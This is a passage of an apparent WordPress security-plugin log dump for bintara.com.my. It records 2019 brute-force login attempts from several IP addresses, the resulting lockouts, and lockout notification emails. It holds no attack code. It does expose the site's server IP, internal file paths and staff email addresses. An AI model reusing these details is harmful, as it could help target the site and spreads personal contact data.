s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYKrbfBTP0kPOVnb8jqeQAAAFY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065646.0128\";s:12:\"REQUEST_TIME\";s:10:\"1569065646\";}}','notice','2019-09-21 11:34:07','2019-09-21 11:34:06',17799352,19289392,'https://bintara.com.my/2019/wp-login.php',1,0,'159.65.85.105'),(25647,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:34:06\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:34:06\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:49:06\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:49:06\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:34:07','2019-09-21 11:34:06',17884032,19289392,'https://bintara.com.my/2019/wp-login.php',1,0,'159.65.85.105'),(25648,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:34:07','2019-09-21 11:34:06',18089760,19289392,'https://bintara.com.my/2019/wp-login.php',1,0,'159.65.85.105'),(25649,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYKuHkXpgmG5P@iB8kYUAAAAJc\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"146.148.80.88\";s:11:\"REMOTE_PORT\";s:5:\"41801\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYKuHkXpgmG5P@iB8kYUAAAAJc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065656.9736\";s:12:\"REQUEST_TIME\";s:10:\"1569065656\";}}','notice','2019-09-21 11:34:18','2019-09-21 11:34:17',17800048,19290072,'https://bintara.com.my/wp/wp-login.php',1,0,'146.148.80.88'),(25650,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:34:17\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:34:17\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:49:17\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:49:17\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:34:18','2019-09-21 11:34:17',17885064,19290072,'https://bintara.com.my/wp/wp-login.php',1,0,'146.148.80.88'),(25651,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:34:18','2019-09-21 11:34:17',18090784,19290072,'https://bintara.com.my/wp/wp-login.php',1,0,'146.148.80.88'),(25652,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYKvXkXpgmG5P@iB8kYWQAAAIU\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"128.199.58.60\";s:11:\"REMOTE_PORT\";s:5:\"39550\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYKvXkXpgmG5P@iB8kYWQAAAIU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065661.4985\";s:12:\"REQUEST_TIME\";s:10:\"1569065661\";}}','notice','2019-09-21 11:34:22','2019-09-21 11:34:21',17799352,19289392,'https://bintara.com.my/blog/wp-login.php',1,0,'128.199.58.60'),(25653,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:34:21\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:34:21\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:49:21\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:49:21\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:34:22','2019-09-21 11:34:21',17884032,19289392,'https://bintara.com.my/blog/wp-login.php',1,0,'128.199.58.60'),(25654,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:34:22','2019-09-21 11:34:21',18089760,19289392,'https://bintara.com.my/blog/wp-login.php',1,0,'128.199.58.60'),(25655,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYK47fBTP0kPOVnb8jqfQAAAFI\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"223.27.16.120\";s:11:\"REMOTE_PORT\";s:5:\"56664\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYK47fBTP0kPOVnb8jqfQAAAFI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065699.2879\";s:12:\"REQUEST_TIME\";s:10:\"1569065699\";}}','notice','2019-09-21 11:35:00','2019-09-21 11:34:59',17796872,19287752,'https://bintara.com.my/test/wp-login.php',1,0,'223.27.16.120'),(25656,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:34:59\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:34:59\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:49:59\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:49:59\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:35:00','2019-09-21 11:34:59',17881592,19287752,'https://bintara.com.my/test/wp-login.php',1,0,'223.27.16.120'),(25657,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:35:00','2019-09-21 11:34:59',18087560,19287752,'https://bintara.com.my/test/wp-login.php',1,0,'223.27.16.120'),(25658,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYK5TDrcQxTmGrCWuaL3wAAAcg\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"167.86.118.145\";s:11:\"REMOTE_PORT\";s:5:\"33544\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYK5TDrcQxTmGrCWuaL3wAAAcg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065702.2925\";s:12:\"REQUEST_TIME\";s:10:\"1569065702\";}}','notice','2019-09-21 11:35:05','2019-09-21 11:35:03',17798008,19288032,'https://bintara.com.my/wordpress/wp-login.php',1,0,'167.86.118.145'),(25659,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:35:03\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:35:03\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:50:03\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:50:03\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:35:05','2019-09-21 11:35:03',17883048,19288032,'https://bintara.com.my/wordpress/wp-login.php',1,0,'167.86.118.145'),(25660,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:35:05','2019-09-21 11:35:03',18088808,19288032,'https://bintara.com.my/wordpress/wp-login.php',1,0,'167.86.118.145'),(25661,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYK6TDrcQxTmGrCWuaL4AAAAdM\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"178.238.237.180\";s:11:\"REMOTE_PORT\";s:5:\"10004\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYK6TDrcQxTmGrCWuaL4AAAAdM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569065705.723\";s:12:\"REQUEST_TIME\";s:10:\"1569065705\";}}','notice','2019-09-21 11:35:07','2019-09-21 11:35:06',17796840,19286880,'https://bintara.com.my/2019/wp-login.php',1,0,'178.238.237.180'),(25662,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:35:06\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:35:06\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:50:06\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:50:06\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:35:07','2019-09-21 11:35:06',17881696,19286880,'https://bintara.com.my/2019/wp-login.php',1,0,'178.238.237.180'),(25663,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:35:07','2019-09-21 11:35:06',18087744,19286880,'https://bintara.com.my/2019/wp-login.php',1,0,'178.238.237.180'),(25664,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s: